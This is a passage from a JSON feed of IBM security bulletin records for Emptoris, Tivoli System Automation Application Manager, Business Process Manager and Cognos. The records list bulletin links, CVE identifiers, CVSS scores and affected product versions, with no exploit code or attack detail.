Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1137)](<http://www.ibm.com/support/docview.wss?uid=swg22004666>)**\n \n \nJan 18th 2017\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement **](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)\n \n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. (CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n \nMarch 7 2016\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply **](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[Management](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[** and IBM Emptoris Services Procurement (CVE-2015-7575 CVE-2016-0466 CVE-2015-7417)?**](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)\n \nDecember 1st 2015\n\n * [**Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)\n \n \nNovember 06 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<http://www-01.ibm.com/support/docview.wss?uid=swg21969875>)**\n \nSeptember 18?2015\n\n * [**Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21966754>)\n \nAugust 26 2015\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.** ](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)\n \nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n \nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n \nJanuary 272015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n \nDecember 312014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n \nSeptember 17 2014\n\n * **[Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_multiple_vulnerabilities_in_ibm_java_sdk_affect_ibm_emptoris_strategic_supply_management_ibm_emptoris_rivermine_telecom_expense_management_and_ibm_emptoris_services_procurement_cve_2014_4263_cve_2014_4244?lang=en_us>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU051\",\"label\":\"N\\/A\"},\"Product\":{\"code\":\"SUPPORT\",\"label\":\"IBM Worldwide Support\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB33\",\"label\":\"N\\/A\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-02T19:28:22", "type": "ibm", "title": "Security Bulletins for Emptoris Strategic Supply Management Platform.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0466", "CVE-2016-2510", "CVE-2016-3092", "CVE-2016-6021", "CVE-2016-6029", "CVE-2016-8919", "CVE-2017-1097", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1190", "CVE-2017-1380", "CVE-2017-1382"], "modified": "2020-11-02T19:28:22", "id": "B0549540072FC1BB0D803052330E32E656605B46C7EDC1BE259FE2273831E00B", "href": "https://www.ibm.com/support/pages/node/783525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:49", "description": "## Summary\n\nIBM Tivoli System Automation Application Manager is shipped as a component of IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, IBM SmartCloud Orchestrator, and IBM SmartCloud Orchestrator Enterprise. Information about security vulnerabilities affecting IBM Tivoli System Automation Application Manager has been published in security bulletins.\n\n## Vulnerability Details\n\nConsult the following security bulletins for IBM Tivoli System Automation Application Manager for vulnerability details and information about fixes: \n\n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-0359)](<http://www-01.ibm.com/support/docview.wss?uid=swg21986467>)\n * [Security Bulletin: Multiple security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-3426, CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982644>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-0306)](<http://www-01.ibm.com/support/docview.wss?uid=swg21981988>)\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2016-0466, CVE-2015-7575, CVE-2016-0448)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977129>)\n * [Security Bulletin: A vulnerability in Apache ActiveMQ affects IBM Tivoli System Automation Application Manager (CVE-2015-5254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977546>)\n * [](<http://www-01.ibm.com/support/docview.wss?uid=swg21970551>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970551>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971113>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-3183)](<http://www.ibm.com/support/docview.wss?uid=swg21967198>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2015-1283)](<http://www.ibm.com/support/docview.wss?uid=swg21967200>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK including Logjam affect IBM Tivoli System Automation Application Manager (CVE-2015-4000, CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963331>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1946)](<http://www.ibm.com/support/docview.wss?uid=swg21963233>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21963673>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1885)](<http://www.ibm.com/support/docview.wss?uid=swg21963672>) \n \n\n * [Security Bulletin: Vulnerability in Diffie-Hellman ciphers affects IBM Tivoli System Automation Application Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21960859>) \n \n\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server 8.5 shipped with IBM Tivoli System Automation Application Manager 4.1 (CVE-2015-1920)](<http://www.ibm.com/support/docview.wss?uid=swg21957955>) \n \n\n * Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2014-3566, CVE-2014-6457) \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation Application Manager (CVE-2014-6593, CVE-2015-0410, CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21698238>) \n \n\n * [](<http://www.ibm.com/support/docview.wss?uid=swg21698238>)[](<http://www.ibm.com/support/docview.wss?uid=swg21691929>)[Security Bulletin: Vulnerability in RC4 stream cipher affects IBM Tivoli System Automation Application Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21882751>)\n\n## Affected Products and Versions\n\n** Principal Product and Version**\n\n| ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.5, 2.4, 2.4.0.3, 2.4.0.2, and 2.4.0.1 \n\nIBM Cloud Orchestrator Enterprise 2.5.0.2, 2.5.0.1, 2.4, 2.4.0.3, 2.4.0.2 and 2.4.0.1\n\n| IBM Tivoli System Automation Application Manager 4.1 \nIBM SmartCloud Orchestrator 2.3 and 2.3.0.1 \n\nIBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1\n\n| IBM Tivoli System Automation Application Manager 3.2.2 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0138", "CVE-2015-0410", "CVE-2015-1283", "CVE-2015-1885", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3183", "CVE-2015-4000", "CVE-2015-4749", "CVE-2015-5254", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0306", "CVE-2016-0359", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-3426", "CVE-2016-3427"], "modified": "2018-06-17T22:30:51", "id": "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "href": "https://www.ibm.com/support/pages/node/261351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:44:47", "description": "## Summary\n\nIBM Business Process Manager is shipped as a component of IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, IBM SmartCloud Orchestrator, and IBM SmartCloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nReview the following security bulletins for IBM Business Process Manager for vulnerability details and information about fixes. \n \n\n\n * [Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server, WebSphere Dynamic Process Edition, and WebSphere Lombardi Edition](<http://www-01.ibm.com/support/docview.wss?uid=swg21986205>)\n * [IBM Security Bulletin: Cross Site Scripting vulnerability in IBM Business Process Manager (CVE-2016-5901)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990852>)\n * [IBM Security Bulletin: HTML injection vulnerability in Business Space might affect IBM Business Process Manager (CVE-2016-3056)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990850>)\n * [IBM Security Bulletin: Security vulnerabilities in IBM SDK for Node.js might affect IBM Business Process Manager (BPM) Configuration Editor (CVE-2014-9748, CVE-2016-1669)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990841>)\n * [IBM Security Bulletin: Security vulnerabilities in Apache Struts might affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-1181, CVE-2016-1182, CVE-2015-0899)](<http://www-01.ibm.com/support/docview.wss?uid=swg21990834>)\n[](<http://www-01.ibm.com/support/docview.wss?uid=swg21985316>)\n\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (CVE-2015-0254)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985316>)\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (Java CPU April 2016)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982559>)\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (CVE-2016-0306)](<http://www-01.ibm.com/support/docview.wss?uid=swg21981008>)\n * [Security Bulletin: Multiple security vulnerabilities in Business Space affect IBM Business Process Manager and WebSphere Process Server (CVE-2015-7407, CVE-2015-7400, CVE-2015-7454)](<http://www-01.ibm.com/support/docview.wss?uid=swg21972005>)\n * [Security Bulletin: Cross-Site scripting vulnerability in IBM Business Process Manager document list control (CVE-2016-0227)](<http://www-01.ibm.com/support/docview.wss?uid=swg21978058>)\n \n\n\n * [Security Bulletin: Multiple Cross-Site scripting vulnerabilities in IBM Business Process Manager Process Portal (CVE-2015-8524)](<http://www-01.ibm.com/support/docview.wss?uid=swg21974472>) ** \n**\n * [Security Bulletin: IBM Business Process Manager authorization checks for process and task deletion are insufficient (CVE-2015-7463)](<http://www-01.ibm.com/support/docview.wss?uid=swg21973442>)\n * [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-0483, CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448)](<http://www-01.ibm.com/support/docview.wss?uid=swg21977021>)\n \n\n\n * [Security Bulletin: A Security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager, WebSphere Process Server and WebSphere Lombardi Edition (CVE-2015-7417)](<http://www.ibm.com/support/docview.wss?uid=swg21975121&myns=swgws&mynp=OCSSFTDH&mynp=OCSSFTBX&mynp=OCSSFTN5&mynp=OCSSFPRP&mynp=OCSSQH9M&mync=E&cm_sp=swgws-_-OCSSFTDH-OCSSFTBX-OCSSFTN5-OCSSFPRP-OCSSQH9M-_-E>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Process Designer used in IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-2613, CVE-2015-2601, CVE-2015-4749, CVE-2015-2625, CVE-2015-1931, CVE-2015-4872)](<http://www-01.ibm.com/support/docview.wss?uid=swg21972165>) \n \n\n * [Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2015-8027, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196)](<http://www-01.ibm.com/support/docview.wss?uid=swg21974459>) \n \n\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM Business Process Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21972046>) \n \n\n * [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21970332>) \n \n\n * [Security Bulletin: Multiple Cross-Site scripting vulnerabilities in IBM Business Process Manager dashboards (CVE-2015-4955)](<http://www.ibm.com/support/docview.wss?uid=swg21966010>) \n \n\n * [Security Bulletin: IBM Business Process Manager (BPM) document store is susceptible to XXE (XML External Entity) attacks. (CVE-2013-5452)](<http://www.ibm.com/support/docview.wss?uid=swg21963014>)[ \n \n](<http://www.ibm.com/support/docview.wss?uid=swg21965001>)\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-1932, CVE-2015-4938, CVE-2015-1946)](<http://www.ibm.com/support/docview.wss?uid=swg21965001>) \n \n\n * [Security Bulletin: Missing authorization concept for document upload and download in IBM Business Process Manager (BPM) CMIS integration (CVE-2015-1904)](<http://www.ibm.com/support/docview.wss?uid=swg21960293>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition (Java CPU July 2015 - CVE-2015-2613, CVE-2015-2601, CVE-2015-4749, CVE-2015-2625, CVE-2015-1931)](<http://www.ibm.com/support/docview.wss?uid=swg21962805>) \n \n\n * [Security Bulletin: Multiple security vulnerabilities in ElasticSearch might affect Process Federation Server (PFS) in IBM Business Process Manager (BPM) - CVE-2015-5531, CVE-2015-5377](<http://www.ibm.com/support/docview.wss?uid=swg21964010>)[ \n \n](<http://www.ibm.com/support/docview.wss?uid=swg21697944>)\n * [Security Bulletin: Cross-site scripting vulnerabilities in IBM Business Process Manager (BPM) and WebSphere Lombardi Edition (WLE) error handling (CVE-2015-0193)](<http://www.ibm.com/support/docview.wss?uid=swg21697944>)[ \n](<http://www.ibm.com/support/docview.wss?uid=swg21699938>)\n * [Security Bulletin: Vulnerabilities in IBM SDK for Node.js affect IBM Business Process Manager Configuration Editor (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204, CVE-2015-0205, CVE-2015-0206) \n \n](<http://www.ibm.com/support/docview.wss?uid=swg21699938>)\n * [Security Bulletin: Multiple vulnerabilities in WebSphere Application Server affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-1885, CVE-2015-1946, CVE-2015-1927)](<http://www.ibm.com/support/docview.wss?uid=swg21699938>)[ \n \n](<http://www.ibm.com/support/docview.wss?uid=swg21903346>)\n * [Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM Business Process Manager (BPM), WebSphere Process Server (WPS), and WebSphere Lombardi Edition (WLE): CVE-2015-1920](<http://www.ibm.com/support/docview.wss?uid=swg21903346>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK Java\u2122 Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition April 2015 CPU (CVE-2015-0488, CVE-2015-0478, CVE-2015-1916)](<http://www.ibm.com/support/docview.wss?uid=swg21959306>) \n \n\n * [Security Bulletin: Vulnerability with Diffie-Hellman ciphers may affect WebSphere Lombardi Edition and IBM Business Process Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959097>) \n \n\n * [Security Bulletin: Vulnerability in RC4 stream cipher affects WebSphere Lombardi Edition and IBM Business Process Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21882624>)[ \n \n](<http://www.ibm.com/support/docview.wss?uid=swg21699935>)\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK Java\u2122 Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-0138 CVE-2014-6593 CVE-2015-0400 CVE-2015-0410)](<http://www.ibm.com/support/docview.wss?uid=swg21699935>) \n \n\n * [Security Bulletin: Multiple vulnerabilities in IBM SDK for Java Technology Edition affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2014-6512, CVE-2014-6457, CVE-2014-6558, CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21692787>) \n \n\n * [Security Bulletin: Vulnerability in SSLv3 affects IBM Business Process Manager (CVE-2014-3566)](<http://www.ibm.com/support/docview.wss?uid=swg21689466>) \n \n\n * [Security Bulletin: TLS padding vulnerability affects IBM HTTP Server shipped with IBM Business Process Manager family products (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21692582>)\n * * Security Bulletin: Cross-Site Scripting vulnerabilities in Dojo affect IBM Business Process Manager (BPM), WebSphere Lombardi Edition (WLE), and WebSphere Process Server (WPS) - CVE-2014-8917\n\n## Affected Products and Versions\n\n** Principal Product and Version**\n\n| ** Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator 2.5, 2.5.0.1, 2.5.0.1 Interim Fix1, 2.5.0.2 \nIBM Cloud Orchestrator Enterprise 2.5.0.1, 2.5.0.1 Interim Fix1, 2.5.0.2| IBM Business Process Manager Standard 8.5.6 \nIBM Cloud Orchestrator 2.4, 2.4.0.1, 2.4.0.2, 2.4.0.3 \n\nIBM Cloud Orchestrator Enterprise 2.4, 2.4.0.1, 2.4.0.2, 2.4.0.3\n\n| IBM Business Process Manager Standard 8.5.0.1 \nIBM SmartCloud Orchestrator 2.3 and 2.3.0.1 \n\nIBM SmartCloud Orchestrator Enterprise 2.3 and 2.3.0.1\n\n| IBM Business Process Manager Standard 8.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5452", "CVE-2014-3566", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-6457", "CVE-2014-6512", "CVE-2014-6558", "CVE-2014-6593", "CVE-2014-8275", "CVE-2014-8730", "CVE-2014-8917", "CVE-2014-9748", "CVE-2015-0138", "CVE-2015-0193", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0254", "CVE-2015-0400", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0899", "CVE-2015-1885", "CVE-2015-1904", "CVE-2015-1916", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1932", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4955", "CVE-2015-5006", "CVE-2015-5377", "CVE-2015-5531", "CVE-2015-7400", "CVE-2015-7407", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7454", "CVE-2015-7463", "CVE-2015-7575", "CVE-2015-8027", "CVE-2015-8524", "CVE-2016-0227", "CVE-2016-0306", "CVE-2016-0448", "CVE-2016-0466", "CVE-2016-0475", "CVE-2016-0483", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1669", "CVE-2016-3056", "CVE-2016-5901"], "modified": "2018-06-17T22:30:51", "id": "104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "href": "https://www.ibm.com/support/pages/node/261377", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:44:48", "description": "## Problem\n\nCognos Analytics and Cognos Business Intelligence Security Bulletins and Alerts.\n\n## Resolving The Problem\n\n## Tab navigation\n\n * CA 11.0.x\n * BI 10.2.2\n * BI 10.2.1\n * BI 10.2\n\nSecurity bulletins and Alerts for Cognos Analytics 11.0.x. \n--- \n**Published / Updated** | **Title** \nJanuary 2018 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22011561>) \nJanuary 2018 | [Cognos Analytics\u306eLibxml2\u8106\u5f31\u6027\u306b\u3064\u3044\u3066](<http://www.ibm.com/support/docview.wss?uid=swg22012361>) \nJanuary 2018 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22011810>) \nSeptember 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg22007242>) \nAugust 2017 | [Cognos Analytics \u306f\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0(XSS)\u306e\u8106\u5f31\u6027\u306e\u5f71\u97ff\u3092\u53d7\u3051\u307e\u3059](<http://www.ibm.com/support/docview.wss?uid=swg22007549>) \nJuly 2017 | [Cognos Analytics is not affected by the Apache Xalan-Java vulnerability (CVE-2014-0107)](<http://www-01.ibm.com/support/docview.wss?uid=swg22005943>) \nJune 2017 | [Cognos Analytics is affected by a Cross-Site Scripting (XSS) vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg22004980>) \nMay 2017 | [Cognos Analytics is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www-01.ibm.com/support/docview.wss?uid=swg22003427>) \nMay 2017 | [Cognos Analytics is affected by CVE-2016-0398](<http://www-01.ibm.com/support/docview.wss?uid=swg21977070>) \nMay 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg22000095>) \nApril 2017 | [Cross Site Scripting (XSS) vulnerability affects Cognos Analytics](<http://www-01.ibm.com/support/docview.wss?uid=swg21999791>) \nMarch 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21998887>) \nMarch 2017 | [Privilege Escalation vulnerability affects Cognos Analytics (CVE-2016-8960)](<http://www-01.ibm.com/support/docview.wss?uid=swg21993720>) \nJanuary 2017 | [A vulnerability in the GSKit component of Cognos Analytics (CVE-2016-0201)](<http://www-01.ibm.com/support/docview.wss?uid=swg21975045>) \nJanuary 2017 | [Cognos Analytics is affected by multiple vulnerabilities](<http://www-01.ibm.com/support/docview.wss?uid=swg21996417>) \n \nSecurity bulletins and Alerts for Cognos Busines Intelligence 10.2.2. \n--- \n**Published / Updated**| **Title** \nJuly 2018| [IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=ibm10715641>) \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| 